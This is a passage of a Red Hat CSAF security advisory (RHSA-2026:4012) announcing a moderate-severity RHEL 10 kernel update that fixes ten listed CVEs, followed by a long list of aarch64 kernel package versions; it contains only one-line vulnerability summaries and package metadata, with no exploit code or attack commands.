| https://lore.kernel.org/linux-cve-announce/202601… | external |
| https://access.redhat.com/security/cve/CVE-2026-23097 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2436802 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-23097 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-23097 | external |
| https://lore.kernel.org/linux-cve-announce/202602… | external |
| https://access.redhat.com/security/cve/CVE-2026-23156 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2439951 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-23156 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-23156 | external |
| https://lore.kernel.org/linux-cve-announce/202602… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel is now available for Red Hat Enterprise Linux 10.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Linux kernel: Use-after-free in device mapper due to race condition in zone reporting (CVE-2025-38141)\n\n* kernel: Linux kernel io_uring: Local privilege escalation, information disclosure, or denial of service via use-after-free (CVE-2025-38106)\n\n* kernel: drm/xe: Make dma-fences compliant with the safe access rules (CVE-2025-38703)\n\n* kernel: Linux kernel: Denial of Service via out-of-bounds read in USB configuration parsing (CVE-2025-39760)\n\n* kernel: HID: intel-thc-hid: intel-thc: Fix incorrect pointer arithmetic in I2C regs save (CVE-2025-39818)\n\n* kernel: Kernel: Use-after-free in GPIO character device allows privilege escalation or denial of service (CVE-2025-40249)\n\n* kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085)\n\n* kernel: macvlan: fix possible UAF in macvlan_forward_source() (CVE-2026-23001)\n\n* kernel: Linux kernel: Denial of Service due to a deadlock in hugetlb folio migration (CVE-2026-23097)\n\n* kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation (CVE-2026-23156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:4012",
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2376052",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376052"
},
{
"category": "external",
"summary": "2376077",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376077"
},
{
"category": "external",
"summary": "2393157",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2393157"
},
{
"category": "external",
"summary": "2394601",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394601"
},
{
"category": "external",
"summary": "2395797",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395797"
},
{
"category": "external",
"summary": "2418886",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418886"
},
{
"category": "external",
"summary": "2429026",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429026"
},
{
"category": "external",
"summary": "2432664",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2432664"
},
{
"category": "external",
"summary": "2436802",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436802"
},
{
"category": "external",
"summary": "2439951",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439951"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_4012.json"
}
],
"title": "Red Hat Security Advisory: kernel security update",
"tracking": {
"current_release_date": "2026-05-11T02:27:50+00:00",
"generator": {
"date": "2026-05-11T02:27:50+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.9"
}
},
"id": "RHSA-2026:4012",
"initial_release_date": "2026-03-09T10:02:53+00:00",
"revision_history": [
{
"date": "2026-03-09T10:02:53+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-09T10:02:53+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-11T02:27:50+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux BaseOS (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel-matched@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel-matched@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-aarch64@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
